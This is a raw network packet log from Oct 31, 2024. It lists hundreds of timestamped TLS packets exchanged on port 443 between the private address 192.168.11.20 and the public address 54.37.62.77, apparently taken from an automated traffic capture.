                                                                                                                                                                                                  Oct 31, 2024 18:05:23.953434944 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.953591108 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.954566956 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.954622984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.954794884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.954794884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.954853058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.954880953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.954880953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.955046892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.956053972 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.956113100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.956290007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.956290007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.956345081 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.956588984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.957396984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.957453012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.957623005 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.957623005 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.957685947 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.957685947 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.957685947 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.957717896 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.957962990 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.958425999 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.958482027 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.958615065 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.958755970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.958791971 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.959012032 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.959593058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.959651947 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.959805965 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.959805965 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.959912062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.959949017 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.960189104 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.960658073 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.960714102 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.960838079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.960838079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.960886955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.960886955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.960927010 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.960972071 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.961097002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.961663961 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.961719990 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.961905956 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.961905956 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.961961031 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.961986065 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.962132931 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.963154078 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.963212013 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.963413954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.963413954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.963466883 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.963490009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.963656902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.964943886 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.964991093 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.965152025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.965152979 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.965214968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.965214968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.965214968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.965248108 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.965447903 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.966226101 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.966283083 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.966424942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.966424942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.966483116 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.966483116 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.966483116 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.966512918 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.966702938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.967031956 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.967075109 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.967222929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.967222929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.967271090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.967271090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.967298985 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.967333078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.967485905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.967926979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.967994928 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.968127012 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.968127012 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.968189955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.968189955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.968219995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.968250036 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.968395948 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.968827009 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.968872070 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.969063044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.969063044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.969122887 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.969141960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.969141960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.969310999 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.969837904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.969881058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970041037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970041037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970041037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970105886 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970139980 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970309973 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970747948 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970792055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970935106 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970935106 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.971041918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.971086979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.971267939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.971728086 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.971769094 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.972004890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.972004890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.972004890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.972065926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.972206116 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973027945 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973072052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973212004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973212004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973289967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973289967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973289967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973324060 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973510027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973795891 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973839998 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973969936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974036932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974036932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974072933 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974208117 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974613905 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974658966 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974814892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974814892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974814892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974879026 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974896908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974896908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975126982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975719929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975761890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975907087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975982904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975982904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975982904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976042032 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976066113 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976206064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976572990 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976624012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976814985 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976815939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976815939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976876974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976912975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.977088928 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.977766037 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.977808952 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.977957964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.977957964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.978019953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.978046894 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.978075027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.978255987 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979557037 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979602098 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979773998 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979774952 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979835033 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979856014 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979856014 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979996920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.980890036 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.980946064 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981129885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981129885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981129885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981129885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981209040 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981230021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981385946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981733084 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981789112 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981961966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981961966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982021093 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982038975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982038975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982166052 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982752085 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982798100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982969046 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982969999 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.983030081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.983030081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.983058929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.983087063 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.983290911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.986139059 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.986196995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.986406088 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.986407042 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.986460924 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.986557007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.986655951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.987225056 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.987272978 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.987488985 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.987488985 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.987544060 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.987565994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.987809896 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.989336014 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.989393950 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.989552021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.989552021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.989615917 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.989615917 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.989615917 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.989648104 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.989834070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.990318060 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.990375042 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.990542889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.990542889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.990542889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.990607977 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.990641117 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.990641117 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.990838051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.991457939 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.991514921 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.991669893 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.991671085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.991731882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.991731882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.991760969 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.991789103 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.991983891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.992347956 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.992403984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.992542028 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.992542028 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.992589951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.992589951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.992616892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.992650986 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.992775917 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.993123055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.993179083 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.993298054 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.993355989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.993355989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.993385077 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.993571043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.994071960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.994117022 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.994220972 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.994220972 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.994262934 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.994288921 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.994312048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.994412899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.994477987 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.995047092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.995093107 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.995188951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.995243073 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.995243073 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.995268106 CET4434975554.37.62.77192.168.11.20
